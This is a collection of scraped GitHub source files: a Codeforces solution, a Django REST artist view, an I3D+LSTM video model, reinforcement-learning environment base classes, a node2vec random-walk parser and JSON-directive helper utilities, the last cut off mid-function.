+{"seq_id":"42289826983","text":"n=int(input())\ns=list(input())\nl='ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\ndef left(ini,cur):\n lin=abs(ini-cur)\n nlin=ini+(26-cur)\n return min(lin,nlin)\n\ndef right(ini,cur):\n lin=abs(ini-cur)\n nlin=(26-ini)+cur\n return min(lin,nlin)\n\n\nA=0;C=2;T=19;G=6\n\n\n\nres=100000\nfor i in range(n-3):\n count=0\n a=l.index(s[i])\n c=l.index(s[i+1])\n t=l.index(s[i+2])\n g=l.index(s[i+3])\n\n if A<=a:count+=left(A,a)\n else:count+=right(A,a)\n if C<=c:count+=left(C,c)\n else:count+=right(C,c)\n if T<=t:count+=left(T,t)\n else:count+=right(T,t)\n if G<=g:count+=left(G,g)\n else:count+=right(G,g)\n\n res=min(res,count)\nprint(res)\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/11514.py","file_name":"11514.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41772975676","text":"\"\"\"View module for handling requests about artists\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom tunaapi.models import Artist\n\nclass ArtistView(ViewSet):\n \"\"\"Artist View\"\"\"\n\n def retrieve(self, request, pk):\n \"\"\"Handle GET requests for single artist\n\n Returns:\n Reponse - JSON serialized artist\n \"\"\"\n try:\n artist = Artist.objects.get(pk=pk)\n song_count = artist.songs.count()\n artist.song_count = song_count\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n except Artist.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n def list(self, request):\n \"\"\"Handle GET requests to get all artists\n\n Returns:\n Reponse - JSON serialized list of artists\n \"\"\"\n artists = Artist.objects.all()\n serializer = ArtistSerializer(artists, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n \"\"\"Handle POST requests to create an artist\n\n Returns:\n Reponse - JSON serialized artist instance\n \"\"\"\n artist = Artist.objects.create(\n name = request.data['name'],\n age = request.data['age'],\n bio = request.data['bio'],\n )\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n\n def update(self, request, pk):\n \"\"\"Handles PUT requests for an artist\n\n Returns:\n Response - JSON serialized artist instance\n \"\"\"\n\n artist = Artist.objects.get(pk=pk)\n artist.name = request.data['name']\n artist.age = request.data['age']\n artist.bio = request.data['bio']\n artist.save()\n\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n \"\"\"Handles DELETE requests for an artist\n\n Returns:\n Response - Empty body with 204 status code\n \"\"\"\n artist = Artist.objects.get(pk=pk)\n artist.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n\nclass ArtistSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for artists\n \"\"\"\n song_count = serializers.IntegerField(default=None)\n class Meta:\n model = Artist\n fields = ('id', 'name', 'age', 'bio',\n 'song_count', 'songs')\n depth = 1\n","repo_name":"WhitleyBeers/django-rest-api-assessment","sub_path":"tunaapi/views/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1108374799","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom model.pytorch_i3d import InceptionI3d, Unit3D\nfrom base_learner import Reshape\n\n\n# I3D + LSTM\n# Long Short-Term Memory\n# https://www.mitpressjournals.org/doi/pdfplus/10.1162/neco.1997.9.8.1735\nclass InceptionI3dLstm(nn.Module):\n\n def __init__(self, input_size, num_classes=2, in_channels=3, dropout_keep_prob=0.5, freeze_i3d=False):\n super().__init__()\n print(\"Initialize the I3D+LSTM model...\")\n\n # Set the first dimension of the input size to be 1, to reduce the amount of computation\n input_size[0] = 1\n\n # I3D input has shape (batch_size, 3, 36, 224, 224)\n # (batch_size, channel, time, height, width)\n a = torch.tensor(np.zeros(input_size), dtype=torch.float32)\n print(\"Input size:\")\n print(\"\\t\", a.size())\n\n # I3D\n self.i3d = InceptionI3d(num_classes=num_classes, in_channels=in_channels)\n if freeze_i3d:\n print(\"Freeze I3D model\")\n self.i3d.train(False)\n\n # I3D output has shape (batch_size, 1024, 5, 7, 7)\n b = self.i3d(a, no_logits=True)\n print(\"I3D model output size:\")\n print(\"\\t\", b.size())\n\n # LSTM\n bs = b.size()\n self.lstm = nn.LSTM(bs[1]*bs[3]*bs[4], 128, num_layers=1, batch_first=True)\n\n # LSTM output has shape (batch_size, 128, 5, 1, 1)\n b = b.transpose(1, 2) # swap time and channel\n self.lstm_reshape_before = Reshape((bs[2], -1))\n c = self.lstm_reshape_before(b)\n c, _ = self.lstm(c)\n cs = c.size()\n self.lstm_reshape_after = Reshape((cs[1], cs[2], 1, 1))\n c = self.lstm_reshape_after(c)\n c = c.transpose(1, 2) # swap time and channel back\n print(\"LSTM model output size:\")\n print(\"\\t\", c.size())\n\n # Logits\n self.dropout = nn.Dropout(dropout_keep_prob)\n self.logits_in_channels = c.size(1)\n self.logits = Unit3D(in_channels=self.logits_in_channels, output_channels=num_classes,\n kernel_shape=[1, 1, 1],\n padding=0,\n activation_fn=None,\n use_batch_norm=False,\n use_bias=True,\n name='logits')\n d = self.logits(self.dropout(c)).squeeze(3).squeeze(3)\n\n # Final output has shape (batch_size, num_classes, time)\n print(\"Final layer output size:\")\n print(\"\\t\", d.size())\n\n def get_i3d_model(self):\n return self.i3d\n\n def replace_logits(self, num_classes):\n self.i3d.replace_logits(num_classes)\n self.logits = Unit3D(in_channels=self.logits_in_channels, output_channels=num_classes,\n kernel_shape=[1, 1, 1],\n padding=0,\n activation_fn=None,\n use_batch_norm=False,\n use_bias=True,\n name='logits')\n\n def delete_i3d_logits(self):\n print(\"Delete logits in the I3D model...\")\n del self.i3d.logits\n del self.i3d.avg_pool\n del self.i3d.dropout\n\n def forward(self, x):\n x = self.i3d(x, no_logits=True)\n x = x.transpose(1, 2) # swap time and channel\n x = self.lstm_reshape_before(x)\n x, _ = self.lstm(x)\n x = self.lstm_reshape_after(x)\n x = x.transpose(1, 2) # swap time and channel back\n x = self.logits(self.dropout(x)).squeeze(3).squeeze(3)\n return x\n","repo_name":"CMU-CREATE-Lab/deep-smoke-machine","sub_path":"back-end/www/model/pytorch_i3d_lstm.py","file_name":"pytorch_i3d_lstm.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"25978132187","text":"\"\"\"\nTMEnvironment\n\"\"\"\nimport enum\nimport types\nfrom abc import abstractmethod\nfrom itertools import zip_longest\nfrom random import shuffle\nfrom typing import Type, Optional, Union, Tuple, List, TypeVar\n\nimport numpy as np\nfrom more_itertools import chunked\n\nfrom tripmaster import T\n\nObsType = TypeVar(\"ObsType\")\nActType = TypeVar(\"ActType\")\n\n\nfrom tripmaster import logging\n\nlogger = logging.getLogger()\n# try:\n# import gym\n# from gym.core import ObsType, ActType\n# except:\n# pass\n\nfrom tripmaster.core.components.machine.data_traits import TMSampleMemoryTraits, TMSampleBatchTraits\nfrom tripmaster.core.components.modeler.memory_batch import TMMemory2BatchModeler\nfrom tripmaster.core.components.modeler.modeler import TMModeler\nfrom tripmaster.core.concepts.component import TMSerializableComponent, TMConfigurable, TMSerializable\nfrom tripmaster.core.concepts.contract import TMContract, TMContractChannel\nfrom tripmaster.core.concepts.data import TMDataChannel, TMDataStream, TMDataLevel\nimport math\n\nfrom tripmaster.core.concepts.hyper_params import TMHyperParams\nfrom tripmaster.core.concepts.scenario import TMScenario\n\n\nclass TMEnvironmentInterface:\n\n\n\n\n\n def accumulated_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n pass\n\n def future_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n pass\n\n def truth(self):\n \"\"\"\n return the expected truth final observation of the environment\n \"\"\"\n return None\n\n\nclass TMEnvironment(TMSerializableComponent):\n \"\"\"\n TMEnvironment\n \"\"\"\n\n def __init__(self, hyper_params,\n scenario=TMScenario.Learning,\n eval=False,\n states=None):\n super().__init__(hyper_params=hyper_params,\n states=states)\n\n if not self.hyper_params.gamma:\n self.hyper_params.gamma = 1.0\n\n self._scenario = scenario\n self._eval = eval\n\n @property\n def scenario(self):\n return self._scenario\n\n @property\n def eval(self):\n return self._eval\n \n # @property \n # def device(self):\n # return self._device\n\n # @device.setter\n # def device(self, value):\n # self._device = value\n\n def accumulated_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n acc_reward = 0\n for idx, reward in enumerate(rewards):\n if reward is not None:\n acc_reward += math.pow(self.hyper_params.gamma, idx) * reward\n return acc_reward\n\n def future_reward(self, explored):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n \n weighted_reward = [math.pow(self.hyper_params.gamma, idx) * explore_step[\"reward\"]\n for idx, explore_step in enumerate(explored)]\n future_reward = np.cumsum(weighted_reward[-1::-1])[-1::-1] # reverse cumsum\n return future_reward\n\n\n @abstractmethod\n def reset(\n self,\n *,\n seed: Optional[int] = None,\n options: Optional[dict] = None,\n ) -> Union[ObsType, Tuple[ObsType, dict]]:\n \"\"\"\n Reset the environment's state.\n Note that this differs from the `reset` method of `gym.Env`, which returns None\n if the random state is exhausted.\n Returns:\n observation (object): the initial observation.\n\n Args:\n seed:\n return_info:\n options:\n\n Returns:\n\n \"\"\"\n\n pass\n\n @abstractmethod\n def step(\n self, action: ActType,\n ) -> Tuple[List[ObsType], List[float], List[bool], List[bool], List[dict]]:\n \"\"\"\n Run one timestep of the environment's dynamics.\n Accepts an action and returns a tuple (observation, reward, terminated, truncated, info).\n \"\"\"\n\n raise Exception(\"Not implemented\")\n\n\n\nclass TMBatchEnvironment(TMEnvironment):\n \"\"\"\n TMBatchEnvironment\n \"\"\"\n\n ObservationBatchTraits = TMSampleBatchTraits\n ActionBatchTraits = TMSampleBatchTraits\n\n def __init__(self, hyper_params=None, envs: TMEnvironmentInterface=None,\n scenario=TMScenario.Learning, eval=False, states=None):\n super().__init__(hyper_params=hyper_params, scenario=scenario, eval=eval, states=states)\n\n self.__envs = envs\n\n\n def batch_size(self):\n return len(self.__envs)\n\n # def __getattr__(self, attr):\n #\n # values = [getattr(env, attr) for env in self.__envs]\n # if isinstance(values[0], (types.FunctionType, types.MethodType)):\n # def wrapper(*args, **kwargs):\n # results = []\n # for idx, func in enumerate(values):\n # result = func(*[arg[idx] for arg in args], **dict((k, v[idx]) for k, v in kwargs.items()))\n # results.append(result)\n # return results\n # return wrapper\n # else:\n # return values\n #\n # def __setattr__(self, key, value):\n #\n # for env in self.envs:\n # setattr(env, key, value)\n\n def reset(\n self,\n *args,\n seed: Optional[int] = None,\n options: Optional[dict] = None,\n ) -> List[ObsType]:\n\n results = list(zip(* [env.reset(*args, seed=seed, options=options)\n for env in self.__envs\n ]))\n\n observation, info = results\n observation = self.ObservationBatchTraits.batch(list(observation))\n\n return observation, info\n\n\n def step(\n self, action_batch: ActType,\n batch_mask: Optional[Union[List[bool], np.ndarray, T.Tensor]] = None,\n ) -> Tuple[List[ObsType], List[float], List[bool], List[bool], List[dict]]:\n\n actions = self.ActionBatchTraits.unbatch(action_batch)\n\n if batch_mask is None:\n batch_mask = [False] * self.batch_size()\n\n step_results = list(zip(*[env.step(act) if not batch_mask[idx] else [None, 0.0, True, True, {}]\n for idx, (env, act) in enumerate(zip(self.__envs, actions))]))\n\n observation, reward, terminated, truncated, info = step_results\n\n batch_mask = [batch_mask[idx] or terminated[idx] or truncated[idx] for idx in range(self.batch_size())]\n\n observation_batch = self.ObservationBatchTraits.batch(observation)\n\n reward = T.to_tensor(reward)\n terminated = T.to_tensor(terminated)\n truncated = T.to_tensor(truncated)\n\n return observation_batch, reward, terminated, truncated, info\n\n def close(self):\n\n for env in self.__envs:\n env.close()\n\n def future_reward(self, explored):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n \n weighted_reward = T.stack([math.pow(self.hyper_params.gamma, idx) * explore_step[\"reward\"]\n for idx, explore_step in enumerate(explored)], dim=-1)\n\n future_reward = T.flip(T.cumsum(T.flip(weighted_reward, dims=[-1]),dim=-1), dims=[-1]) # reverse cumsum\n\n return future_reward.float()\n\nclass TMEnvironmentPool(TMSerializableComponent):\n \"\"\"\n TMEnvironmentPool: preserve a pool of environments for training\n the environments may be identical or different.\n \"\"\"\n\n def __init__(self, hyper_params, name: str,\n envs= None,\n scenario=TMScenario.Learning,\n eval=False,\n states=None):\n super().__init__(hyper_params, scenario=scenario, states=states)\n\n self.__name = name\n self.__scenario = None\n self.__eval = eval\n self.__envs = envs if envs else []\n if states:\n self.load_states(states)\n\n def reuse(self):\n pass \n\n @property\n def name(self):\n return self.__name\n\n @property\n def scenario(self):\n return self.__scenario\n\n @property\n def eval(self):\n return self.__eval\n\n @property\n def envs(self):\n return self.__envs\n\n def choose(self, sample_num):\n\n indexes = list(range(len(self.__envs)))\n shuffle(indexes)\n\n for index_chunk in chunked(indexes, sample_num):\n yield TMBatchEnvironment(envs=[self.__envs[index] for index in index_chunk])\n\n @abstractmethod\n def test(self, test_config):\n pass\n\n\nclass TMEnvironmentPoolGroup(TMSerializableComponent):\n \"\"\"\n TMDataStream\n Some thoughts, but not feasible: \"Note: as a fundamental components of TM which across all the data pipeline,\n it should not be subclassed and change its default behavior.\n For old code, please load the data in TMOfflineInputStream and then\n return a TMDataStream\"\n \"\"\"\n\n def __init__(self, hyper_params=None, scenario=TMScenario.Learning,\n eval=False,\n states=None):\n\n super().__init__(hyper_params)\n\n self._pools = dict()\n self._scenario = scenario\n self._eval = eval\n \n\n if states is not None:\n self.load_states(states)\n logger.info(\"add sampled training eval channel \")\n\n # if self.hyper_params.train_sample_ratio_for_eval or self.hyper_params.train_sample_ratio_for_eval > 0:\n # ratio = self.hyper_params.train_sample_ratio_for_eval\n # self.add_sampled_training_eval_channels(ratio)\n\n logger.info(\"sampled training eval channel added\")\n\n\n def choose(self, sample_num, eval=False):\n\n if eval:\n pools = self.eval_pools\n else:\n if self.scenario == TMScenario.Learning:\n pools = self.learn_pools\n elif self.scenario == TMScenario.Inference:\n pools = self.inference_pools\n else:\n raise Exception(\"Unknown scenario with eval=False\")\n\n for pool_name in pools:\n yield from self[pool_name].choose(sample_num=sample_num)\n\n\n @property\n def scenario(self):\n return self._scenario\n\n @property\n def eval(self):\n return self._eval\n\n @property\n def pools(self):\n return self._pools.keys()\n\n\n def add_sampled_learning_eval_pools(self, ratio=None):\n \n if ratio is None:\n ratio = self.hyper_params.train_sample_ratio_for_eval\n if not ratio or (isinstance(ratio, (int, float)) and ratio < 0):\n return\n \n import random, copy\n sampled_channels = []\n for channel in self.eval_pools:\n assert channel in self._pools\n \n sampled = [copy.deepcopy(env) for env in self._pools[channel].envs\n if random.random() < ratio]\n if len(sampled) <= 0:\n continue\n \n key = f\"{channel}#sampled\"\n sampled_channels.append(key)\n self._pools[key] = TMEnvironmentPool(hyper_params=None, name=key,\n envs=sampled, scenario=self.scenario,\n eval=self.eval)\n\n \n self.hyper_params.eval_pools = list(set(list(self.hyper_params.eval_pools) + sampled_channels))\n\n @property\n def learn_pools(self):\n return self.hyper_params.learn_pools if self.hyper_params.learn_pools else []\n\n @learn_pools.setter\n def learn_pools(self, value):\n self.hyper_params.learn_pools = tuple(value)\n\n @property\n def eval_pools(self):\n return self.hyper_params.eval_pools if self.hyper_params.eval_pools else []\n\n @eval_pools.setter\n def eval_pools(self, value):\n self.hyper_params.eval_pools = tuple(value)\n\n @property\n def inference_pools(self):\n return self.hyper_params.inference_pools if self.hyper_params.inference_pools else []\n\n @inference_pools.setter\n def inference_pools(self, value):\n self.hyper_params.inference_pools = tuple(value)\n\n def __getitem__(self, item):\n\n return self._pools[item]\n\n def __setitem__(self, key, value):\n if not isinstance(value, TMEnvironmentPool):\n value = TMEnvironmentPool(hyper_params=None, name=key,\n envs=value, scenario=self.scenario,\n eval=self.eval)\n\n self._pools[key] = value\n\n def test(self, test_config):\n\n for k, v in self._pools.items():\n v.sample_num = test_config.sample_num\n\n self.add_sampled_learning_eval_pools(ratio=1)\n\n def states(self):\n for k, v in self._pools.items():\n v.reuse()\n\n return {\"pools\": {k: v.envs for k, v in self._pools.items() if not k.endswith(\"#sampled\")},\n \"eval\": self._eval, \"scenario\": self._scenario.name}\n\n def secure_hparams(self):\n import copy\n hyper_params = copy.deepcopy(self.hyper_params)\n for channel in hyper_params.channels:\n hyper_params.channels[channel] = [k for k in hyper_params.channels[channel]\n if not k.endswith(\"#sampled\")]\n return hyper_params\n\n def load_states(self, states):\n self._scenario = TMScenario[states[\"scenario\"]]\n self._eval = states[\"eval\"]\n self._pools = {k: TMEnvironmentPool(hyper_params=None, name=k,\n envs=v, scenario=self.scenario, eval=self._eval)\n for k, v in states[\"pools\"].items() if not k.endswith(\"#sampled\")}\n","repo_name":"baidu-research/tripmaster","sub_path":"tripmaster/core/components/environment/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36434073491","text":"\n\ndef parse_graph(graph_string):\n \"\"\"\n 用于生成随机游走的部分\n :param graph_string:\n :return:\n \"\"\"\n parts = graph_string.split(\"\\t\")\n # parts[0]: 不确定,但是应该是一个id?\n # parts[1]: 是一些用户\n # parts[2]: 似乎是年份?\n # parts[3]: 不像是用户id,可能是时间?\n\n edge_strs = parts[4].split(\" \")\n # src id: tgt id:1\n\n node_to_edges = dict()\n for edge_str in edge_strs:\n edge_parts = edge_str.split(\":\")\n source = int(edge_parts[0])\n target = int(edge_parts[1])\n\n if not source in node_to_edges:\n neighbors = list()\n node_to_edges[source] = neighbors\n else:\n neighbors = node_to_edges[source]\n neighbors.append((target, get_global_degree(target)))\n # node_to_edges: src -> (tgt, tgt degree)\n # 这个dict有啥意思?\n\n\n nx_G = nx.DiGraph()\n for source, nbr_weights in node_to_edges.items():\n # 这是老版本的dict.items()吗\n for nbr_weight in nbr_weights:\n target = nbr_weight[0]\n\n if opts.trans_type == 0: # trans_type不是string吗,怎么又012了\n edge_weight = get_edge_weight(source, target) + pseudo_count\n weight = edge_weight\n elif opts.trans_type == 1:\n target_nbrs = node_to_edges.get(target, None)\n local_degree = 0 if target_nbrs is None else len(target_nbrs)\n local_degree += pseudo_count\n weight = local_degree\n else:\n global_degree = nbr_weight[1] + pseudo_count\n weight = global_degree\n # 应该分别对于edge,deg,DEG\n nx_G.add_edge(source, target, weight=weight)\n # 这里就是为每一条边定义了weight,用来计算转移概率的\n\n # List of the starting nodes.\n roots = list()\n # List of the starting nodes excluding nodes without outgoing neighbors.\n roots_noleaf = list()\n # exclude?\n\n str_list = list()\n str_list.append(parts[0])\n\n probs = list()\n probs_noleaf = list()\n weight_sum_noleaf = 0.0\n weight_sum = 0.0\n\n # Obtain sampling probabilities of roots.\n for node, weight in nx_G.out_degree(weight=\"weight\"):\n org_weight = weight\n if weight == 0: weight += pseudo_count\n weight_sum += weight\n if org_weight > 0:\n weight_sum_noleaf += weight\n\n for node, weight in nx_G.out_degree(weight=\"weight\"):\n org_weight = weight\n if weight == 0: weight += pseudo_count\n roots.append(node)\n prob = weight / weight_sum\n probs.append(prob)\n if org_weight > 0:\n roots_noleaf.append(node)\n prob = weight / weight_sum_noleaf\n probs_noleaf.append(prob)\n\n sample_total = opts.walks_per_graph\n first_time = True\n G = node2vec.Graph(nx_G, True, opts.p, opts.q)\n G.preprocess_transition_probs()\n\n while True:\n if first_time:\n first_time = False\n node_list = roots\n prob_list = probs\n else:\n node_list = roots_noleaf\n prob_list = probs_noleaf\n n_sample = min(len(node_list), sample_total)\n if n_sample <= 0: break\n sample_total -= n_sample\n\n sampled_nodes = np.random.choice(node_list, n_sample, replace=False, p=prob_list)\n walks = G.simulate_walks(len(sampled_nodes), opts.walk_length, sampled_nodes)\n for walk in walks:\n str_list.append(' '.join(str(k) for k in walk))\n return '\\t'.join(str_list)\n\n","repo_name":"1170500820/DLtools","sub_path":"utils/graph/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"4237221320","text":"\n# Standard library\nimport os\nimport sys\nimport json\nfrom json import JSONDecodeError\nimport re\nfrom collections import namedtuple, OrderedDict\n\n# Libraries\nimport pandas as pd\nimport jsonschema\nfrom colorama import Fore\nimport openpyxl\nfrom openpyxl.styles import Alignment, Border, Side, PatternFill, Color\nfrom openpyxl.utils import get_column_letter\n\n# Local\nfrom cascade import quicklog\nfrom cascade.bomstrip import open_and_seek_past_bom\n\nqlog = quicklog.get_logger()\nlprint = qlog.lprint\n\ndef make_json(data_dict, simple=None):\n \"\"\"Make well formatted JSON for insertion into cascade word docs.\n\n JSON will be enclosed by '$ like: '${\"key\":\"value\"}$'\n JSON will be on one line (simple) if it contains only one key/value pair, or if\n the argument simple==true\n \"\"\"\n if simple is None:\n # Default to simple as long as the JSON contains only one item and\n # that items is not a dict.\n simple = False\n if len(data_dict) <= 1:\n for key in data_dict:\n if not isinstance(data_dict[key], dict):\n simple = True\n\n if simple:\n return '${}$'.format(json.dumps(data_dict, separators=(', ', ':')))\n return '${}$'.format(json.dumps(data_dict, indent=4, separators=(',', ':'))).replace('${\\n ', '${')\n\ndef make_json_autoformat(data_dict):\n \"\"\"Makes JSON formatted for inclusion in a Word doc according to dict content\"\"\"\n if not is_shortform_dict(data_dict):\n return make_json(data_dict, simple=False)\n if 'satisfies' not in data_dict:\n return make_json(data_dict, simple=True)\n if len(data_dict['satisfies']) <= 1:\n return make_json(data_dict, simple=True)\n\n # Use multi-line formatting because there are multiple 'satisfies' directives\n json_text = make_json(data_dict, simple=False)\n # Remove carriage return between \"id\" and \"method\" (for a little more compactness)\n json_text = json_text.replace(',\\n \"method\"', ', \"method\"')\n return json_text\n\ndef json_to_dict(json_text):\n \"\"\"Parse JSON text and return as a python dict\n\n On error: logs the error and returns None\n \"\"\"\n\n json_dict = None\n try:\n json_dict = json.loads(\n json_text,\n object_pairs_hook=OrderedDict # Preserve item order by using an OrderedDict\n )\n except JSONDecodeError as err:\n json_error_text = json_text\n # Show error location for errors of the form:\n # \"Reported JSON decode error: Expecting ',' delimiter: line 1 column 89 (char 88)\"\n # pylint: disable=locally-disabled, anomalous-backslash-in-string\n result = re.search('line (?P\\d+) column (?P\\d+) \\(char (?P\\d+)\\)', str(err))\n if result:\n # Colorize the break between good/bad text\n json_error_text = (\n Fore.GREEN +\n json_text[:int(result.group('char_loc'))] +\n Fore.RESET +\n Fore.RED +\n json_text[int(result.group('char_loc')):] +\n Fore.RESET\n )\n\n qlog.error('Could not decode cascade directive (JSON parsing encountered error).'\n + '\\n Reported JSON decode error: {}'.format(err)\n + '\\n JSON string being parsed:'\n + '\\n {}'.format(json_error_text)\n + '\\n JSON sting with whitespace condensed:'\n + '\\n {}'.format(' '.join(json_error_text.split()))\n )\n return json_dict\n\ndef extract_json_from_directive(text):\n '''Take a sting of form \"${}$\" and return \"${}$\" '''\n if '${' not in text or '}$' not in text:\n raise ValueError('Expected directive to contain \"${\" and \"}$\"')\n return '{' + text.split('${')[1].split('}$')[0] + '}'\n\ndef extract_directives_from_text(text):\n '''Return all directives appearing in a string of text\n\n Returns a list of all substrings of the form '${}$'\n Example: 'Spam ${eggs}$ SpAm ${SPAM}$ eggs and spam'--> ['${eggs}$'.'${SPAM}$']\n '''\n return re.findall(r\"(?P\\${.+?}\\$)\", text)\n\ndef directive_to_dict(text):\n json_text = text.strip()\n if json_text.startswith('${') and json_text.endswith('}$'):\n json_text = json_text.strip('$')\n json_dict = json_to_dict(json_text)\n return json_dict\n return None\n\ndef is_shortform_dict(directive_dict):\n '''Return True if the dict is a shortform object id dict'''\n return 'id' in directive_dict\n\ndef expand_shortform_dict(directive_dict):\n '''Expand a shortform dict into its explicit form'''\n if not is_shortform_dict(directive_dict):\n raise ValueError\n return {'#shortform': directive_dict}\n\ndef get_requirement_id(text, fuzzy=False):\n \"\"\"Find requirement ID of the general form 'ABC-DEF-1' within a string like '[ABC-DEF-1, X]'\n\n If fuzzy is false, will only find IDs with a numerical suffix\n If fuzzy is true, will find any suffix (useful for finding pending\n annotations of the form ABC-DEF-?)\n\n Returns the requirement ID if found.\n Returns None otherwise.\n \"\"\"\n if fuzzy:\n regex = r\"^\\s*\\[\\s*(?P[\\w\\.]+-[\\w\\.]+-\\S*)\\s*,.+]\\s*$\"\n else:\n regex = r\"^\\s*\\[\\s*(?P[\\w\\.]+-[\\w\\.]+-\\d+)\\s*,.+]\\s*$\"\n result = re.search(regex, text)\n if result:\n return result.group('requirement_id')\n return None\n\ndef legacy_object_id_to_directive_dict(text):\n '''Convert a legacy object ID do a Cascade directive dict\n\n Returns None if object ID format is not parseable\n '[SRD-RCN-0001, X]' --> ['id':'SRD-RCN-0001', 'method':'x']\n '[SRD-RCN-3186, X, GUI]' --> ['id':'SRD-RCN-0001', 'method':'x', 'type':'GUI']\n '[SRD-RCN-4843, X, RSG-3895]' --> ['id':'SRD-RCN-0001', 'method':'x', 'old_id':'RSG-3895']\n '[SRD-RCN-4845, X, APP_B-8439, RSG]' --> ['id':'SRD-RCN-0001', 'method':'x', 'old_id':'APP_B-8439', 'type':'RSG']\n\n '''\n requirement_types = ['RSG', 'SYS', 'GUI', 'BIT', 'RLI', 'RSG', 'SR']\n pieces = text.strip().strip('[').strip(']').split(',')\n pieces = [piece.strip() for piece in pieces]\n if len(pieces) not in (2, 3, 4):\n qlog.error('Ignoring legacy Object ID item: \"{}\".'.format(text) +\n ' Expected to find 2, 3, or 4 items in brackets but found {}: {}'.format(\n len(pieces), pieces) + '.' +\n ' You must correct this field to contain the expected items.')\n return None\n else:\n if len(pieces) == 2:\n # Form: '[SRD-RCN-0001, X]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1])])\n elif len(pieces) == 3:\n if pieces[2] in requirement_types:\n # Form: '[SRD-RCN-3186, X, GUI]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('type', pieces[2]),\n ])\n else:\n # Form: '[SRD-RCN-4843, X, RSG-3895]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('old_id', pieces[2]),\n ])\n elif len(pieces) == 4:\n # Form: '[SRD-RCN-4845, X, APP_B-8439, RSG]'\n if pieces[3] not in requirement_types:\n qlog.warning('Unexpected requirement type in 4th field of legacy object id: \"{}\". Expected one of: {}'.format(\n text,\n requirement_types))\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('old_id', pieces[2]),\n ('type', pieces[3]),\n ])\n else:\n qlog.error('Unexpected legacy object ID format. Expected 2, 3, or 4 fields. Object ID will be ignored: \"{}\"'.format(text))\n return None\n return directive_dict\n\ndef list_to_range_tuples(item_list):\n '''Given a sorted list of numbers, return a list of range tuples spanning all numbers in the list\n Group contiguous paragraph indices to create a list of tuples where each tuple\n specifies a range of paragraphs to purge\n Example: [100,99,98,70,49,48,47,29,28,2] --> [ (100,98), (70,70), (49,47), (29,28), (2,2) ]\n '''\n sorted_unique = sorted(list(set(item_list)), reverse=True)\n ranges = []\n range_in_progress = False\n first = None\n previous = None\n for i in sorted_unique:\n if not range_in_progress:\n first = i\n previous = i\n range_in_progress = True\n continue\n else:\n if i == previous - 1:\n previous = i\n continue\n else:\n # i is not in current range\n # Save previous range\n ranges.append((first, previous))\n # Begin a new range\n first = i\n previous = i\n # Save the final range\n ranges.append((first, previous))\n return ranges\n\nclass Indent:\n '''Print/Format indentation manager'''\n\n def __init__(self):\n self.level = 0\n\n def inc(self):\n '''Increment indentation inward'''\n self.level += 1\n\n def dec(self):\n '''Decrement indentation outward'''\n self.level = max(self.level-1, 0)\n\n def print(self, text):\n '''Print with current indentation'''\n print('{}{}'.format(self.__repr__(), text))\n\n def format(self, text):\n '''Format with current indentation'''\n return '{}{}'.format(self.__repr__(), text)\n\n def __repr__(self):\n '''Return current indentation pad string'''\n return ' ' * self.level\n\ndef get_heading_level(stylename):\n '''Determines whether a stylename is a heading style. Returns heading number if true, else None\n '''\n\n # Headings of the form 'Heading N'\n if stylename.startswith('Heading'):\n return int(stylename.split(' ')[-1])\n # Headings of the form 'Appendix_A_Level_N'\n if stylename.startswith('Appendix_') and 'Level_' in stylename:\n return int(stylename.split('_')[-1])\n return None\n\ndef to_snippet(text, length=40):\n '''Truncate text to requested length and append \"...\"\n '''\n if len(text) < length:\n return text\n return text[:min(len(text), length-3)] + '...'\n\nSplitline = namedtuple('Splitline', 'text delimiter')\n\ndef mutlisplit(text, delimiter_list, preserve_delimiters=True):\n result_list = [Splitline(text, '')]\n for delimiter in delimiter_list:\n new_result_list = []\n for item in result_list:\n new_items = [Splitline(text, delimiter) for text in item.text.split(delimiter)]\n new_items[-1] = Splitline(new_items[-1].text, item.delimiter)\n new_result_list += new_items\n result_list = new_result_list\n\n if preserve_delimiters:\n return [item.text + item.delimiter for item in result_list]\n else:\n return [item.text for item in result_list]\n\ndef represents_int(s):\n \"\"\"Return true if string represents an integer\"\"\"\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef get_directive_type(directive):\n \"\"\"Given a dict containing a directive, return the directive type\n\n Directives have the form {'' : }\n Example: {'#requirement': {...}} --> '#requirement'\n \"\"\"\n keys = 